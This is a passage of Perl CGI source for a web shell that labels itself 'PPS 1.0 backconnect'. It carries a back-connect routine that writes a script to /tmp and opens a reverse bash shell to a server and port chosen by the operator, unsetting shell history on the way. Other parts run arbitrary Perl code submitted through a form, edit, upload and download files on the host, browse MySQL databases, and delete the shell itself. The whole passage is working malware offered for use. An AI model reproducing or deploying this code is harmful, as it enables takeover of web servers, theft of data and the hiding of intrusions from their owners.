sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].' action="'.$ScriptLocation.'">';print '<input type="hidden" name="a" value="sql_databases">';print "<input type=hidden name=database value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_tables">';print "<input type=hidden name=table value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if (f.checked){var cn=document.getElementById("cquery").value;if (cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script>';print '<tr><form method=post name=cc'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_columns">';print '<input type=hidden name=column value='.$$ref[0].'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td>';print "</form><tr>";}
sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print "<td><font face='Verdana' size='1'>[$s4et] </font></td><td><font face='Verdana' size='1'>$$ref[0]</font></td>";print "</form></tr>";}
sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}
sub NetForm {$rip = $ENV{'REMOTE_ADDR'};
print <<END;
<h1>Back-connect  [perl]</h1><br/><form name='nfp' method=post action=$ScriptLocation>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
END
}
sub back{open(FILE,">/tmp/bbc.pl");$bbc = '#!/usr/bin/perl
use IO::Socket;$system	= "/bin/bash";use Socket;use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in("'.$port.'", inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE; unset SAVEHIST ;echo PPS 1.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}
sub NetGo{&PrintPageHeader("c");$target =  $in{'server'};$port =  $in{'ppport'};NetForm();back();&PrintPageFooter;}
sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}
sub EvalCodeForm{
print <<END;
<h1>Execution PERL-code</h1><form name=pf method=post action=$ScriptLocation><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
END
}
sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode =  $in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}
sub EditFilePathForm {
print <<END;
<code><br><form name=pfsd method=post action=$ScriptLocation>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
END
}
sub EditFilePath{$fpath = $in{'d'} . "/". $in{'path'};EditFilePrint();}
sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}
sub EditFileForm{open(FILE, $fpath);@file = <FILE>;$fccodde = HtmlSpecialChars(join('', @file));
print <<END;
<h1>Edit File: $fpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
}
sub ViewFile{$fpath = $CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE, $fpath);@file = <FILE>;$fccodde = join('', @file); 
$fccodde = HtmlSpecialChars($fccodde);
print <<END;
<h1>View File: $fpath</h1><span>htmlspecialchars:</span><br><textarea name=view class=bigarea>$fccodde</textarea></form>
END
&PrintPageFooter;
}
sub EditFile {&PrintPageHeader("c");$fccode = $in{'ccode'};$ffpath = $in{'path'};
print <<END;
<h1>Edit File: $ffpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="edit_file"><niput type=hidden name=path value=$ffpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);print "File $ffpath saved";&PrintPageFooter;}
sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};
$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name, value, expires, path, domain, secure){document.cookie=name+"="+escape(value)+((expires) ? "; expires=" + expires : "")+((path) ? "; path=" + path : "")+((domain) ? "; domain=" + domain : "")+  ((secure) ? "; secure" : "");}setCookie("column", "$column", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et = 0;$sth = $dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "</table>";print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){
$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0; 
$sth = $dbh->prepare("show columns from $table from $dbb");$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++; sql_columns_form();}$rc=$sth->finish;print "</table></td>";$s4et = 0;$zapros = "SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc = $sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");
sql_vars_set();sql_loginform();$qqquery =  $in{'table'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires) ? ";expires="+expires:"")+((path) ? ";path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}
setCookie("table", "$qqquery", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%><td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td></table></td></table>";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros = "SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}
sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb = $in{'database'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie = name+"="+escape(value) +((expires) ? ";expires="+expires:"")+((path) ? "; path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}setCookie("dbb","$ddb","","/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$zapros = "SHOW TABLES FROM `$ddb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;print "</table>";print "<b>Tables from $ddb:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";&PrintPageFooter;}
sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}
sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if ($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery = $in{'query'};}$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100% cellspacing=0 cellpadding=1 cols=2>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$sth = $dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td><font face=Verdana size=1>[$s4et]</font></td><td><font face=Verdana size=1>$$ref[0]</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintPageFooter;}
sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros = "SHOW DATABASES";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100%>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td>";   sql_query_form();print "</td></table>";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...";print '</font>';&PrintPageFooter;}
sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}
sub DownloadFile{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |	(!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;
}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){
&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);}}
sub Remove{use Cwd qw(abs_path);my $path = abs_path($0);system("rm $path");}
&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&DownloadFile;}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}
